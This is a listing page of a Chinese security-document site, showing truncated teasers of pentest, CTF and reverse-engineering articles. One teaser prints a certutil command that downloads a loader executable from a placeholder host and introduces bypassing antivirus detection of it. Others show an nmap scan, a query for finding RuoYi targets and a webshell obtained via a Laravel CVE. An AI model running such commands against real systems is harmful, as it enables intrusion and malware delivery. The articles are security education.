爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

记一次实战中对Ruoyi系统的渗透

# Ruoyi系统渗透测试实战指南 ## 1. Ruoyi系统简介 Ruoyi是一个基于Spring Boot和Shiro权限管理框架的开源后台管理系统，广泛应用于企业级应用开发。由于其流行性，系统存在多个已知安全漏洞。 ## 2. 信息收集方法 ### 2.1 识别Ruoyi系统使用搜索引擎语法： ``` body="Ruoyi" ``` 此语法可发现大量使用Ruoyi系统的网站。 ## 3. 常见漏洞利用 ### 3.1 Druid控制台弱口令漏洞 **漏洞描述**：Drui

2025-08-22 11:58:18

内网渗透该怎么学-小白篇

# 内网渗透全面学习指南 ## 一、入口点寻找与初始入侵 ### 1. 信息收集与扫描 - **Nmap扫描**：用于发现开放端口和服务 ```bash nmap -sV -p- 192.168.157.131 ``` ### 2. Web应用漏洞利用 - **Laravel Debug模式RCE (CVE-2021-3129)** - 利用工具：laravel-CVE-2021-3129-EXP - 配合Godzilla v2.96获取shell - 注意：高版本

2025-08-22 11:57:41

渗透基础-rcube_webmail版本探测

# RoundCube Webmail 版本探测技术详解 ## 1. 背景介绍 RoundCube Webmail 是一款广泛使用的开源邮件系统，在渗透测试和安全评估中，准确识别目标系统的版本号是漏洞利用和风险评估的重要前提。本文详细介绍了一种基于静态资源文件修改时间的 RoundCube Webmail 版本探测方法，并提供了完整的实现方案。 ## 2. 探测原理 ### 2.1 核心发现通过分析 RoundCube Webmail 的 HTML 源代码，发现系统在引用静态资源文件

2025-08-22 11:56:20

SRC挖掘奇特思路案例

# SRC挖掘奇特思路案例教学文档 ## 前言 SRC挖掘与常规渗透测试不同，需要出奇守正的思路。本教学文档将详细讲解两个独特的漏洞挖掘案例，包括403绕过和二维码跳转漏洞的利用方法。 ## 案例一：利用下载工具绕过403限制 ### 漏洞描述这是一个特殊的403绕过技术，不同于常规的路径遍历(../, ..;/)或请求头(XFF, UA)修改方法，而是利用下载工具的特性实现绕过。 ### 复现步骤 1. **发现目标资源** - 访问目标网站，发现营销案例中有多个视频文件

2025-08-22 11:55:34

分析某杀软规则库绕过certutil免杀实践

# Certutil免杀技术分析与绕过实践 ## 一、Certutil基础利用与拦截现状 Certutil是Windows系统自带的证书管理工具，常用于渗透测试中的文件下载操作。典型利用命令如下： ``` certutil -urlcache -split -f http://xxxxx/loader.exe ``` 然而，主流杀毒软件已将此命令加入规则库进行拦截。本文将以某杀软为例，分析其拦截规则并探讨绕过方法。 ## 二、杀软规则库分析技术 ### 1. 内存字符串分析使用火

2025-08-22 11:55:02

PE 文件结构剖析：手工压缩与注入实战

# PE文件结构剖析与手工压缩、注入实战 ## 1. PE文件概述 PE (Portable Executable) 是可移植的可执行文件，是Windows操作系统下可执行文件的标准格式，包括： - 可执行文件 (exe, scr) - 动态链接库 (dll, ocx, cpl) - 驱动程序 (sys, vxd) 了解PE文件结构对于逆向工程、软件分析和安全研究非常重要。 ## 2. PE文件结构详解 ### 2.1 DOS头 (DOS Header + DOS Stub) **D

2025-08-22 11:44:35

从HECTF ezjava 入手 Vaadin 调用链挖掘

# Vaadin反序列化漏洞分析与利用 ## 1. 漏洞背景 Vaadin是一个用于构建Web应用程序的Java框架。在HECTF ezjava题目中，发现Vaadin框架存在反序列化漏洞利用链，可以通过精心构造的Payload实现远程代码执行。 ## 2. 环境搭建要分析该漏洞，需要搭建以下环境： ```xml com.vaadin vaadin-server 7.7.14 com.vaadin vaadin-shared 7.

2025-08-22 11:43:31

代码审计 - MCMS v5.4.1 0day挖掘

# MCMS v5.4.1 漏洞分析与利用教学文档 ## 一、系统概述 MingSoft MCMS 是中国铭飞公司开发的一个开源 J2EE 内容管理系统。本次分析针对 v5.4.1 版本，发现两个关键漏洞： 1. 后台文件上传绕过漏洞 (CVE-2024-42990) 2. 前台文件上传RCE漏洞 (CVE-2024-42991) ## 二、环境搭建 1. 下载 MCMS v5.4.1 源码：https://github.com/ming-soft/MCMS/releases/tag/

2025-08-22 11:42:11

pyramid 框架无回显挖掘

# Pyramid框架无回显漏洞挖掘与利用技术文档 ## 1. 漏洞背景本文档基于国城杯CTF比赛中一道Pyramid框架题目，重点探讨Pyramid框架下的无回显漏洞挖掘与利用技术。题目场景为无回显、不出网环境下的漏洞利用，最终通过技术手段实现命令执行和回显。 ## 2. 初始信息收集 ### 2.1 登录爆破 - 题目存在用户登录功能 - 有验证码保护，但提示密码为纯数字 - 成功爆破出密码为"123456" - 登录用户为"admin" ### 2.2 文件读取漏洞 - 观察U

2025-08-22 11:41:09

从2024年网鼎杯半决赛入门IOT————IOT网络协议分析babyRTP

# IOT网络协议分析：从2024年网鼎杯半决赛babyRTP题目入门 ## 1. 题目背景与概述这是一个基于RTP(实时传输协议)的IOT网络协议分析题目，涉及双端推流服务。题目名称为"babyRTP"，主要考察对RTP协议的理解和实际应用能力。 **RTP协议基础**： - RTP(Real Time Transport Protocol)：由IETF于1996年在RFC 1889中公布 - 为IP上的语音、图像等实时传输的多媒体数据提供端对端的传输服务 - 本身不保证服务质量(Qo

2025-08-22 11:40:14

Windows hook框架Detours踩坑

# Detours框架使用详解与踩坑指南 ## 一、Detours简介 Detours是微软官方提供的Windows平台hook框架，相比Android上种类繁多的hook框架，Windows上可选的hook框架较少。Detours通过修改目标函数的前几个字节，将其替换为跳转指令，实现函数拦截和替换。 ## 二、下载与编译 1. 源码获取： - 官方GitHub：https://github.com/microsoft/Detours/releases/tag/v4.0.1 2.

2025-08-22 11:39:08

某某新闻逆向分析

# 某某新闻APP逆向分析技术文档 ## 1. 分析背景本文档详细记录了某某新闻APP中关键参数`sn`和`st`的逆向分析过程，这两个参数用于新闻请求的身份验证，不能随意修改否则会导致请求失效。 ## 2. 分析工具准备 - **反编译工具**: JADX - **脱壳工具**: BlackDex (https://github.com/CodingGay/BlackDex/releases) - **Hook框架**: Frida - **反汇编工具**: IDA Pro - **

2025-08-22 11:37:58

跳转到页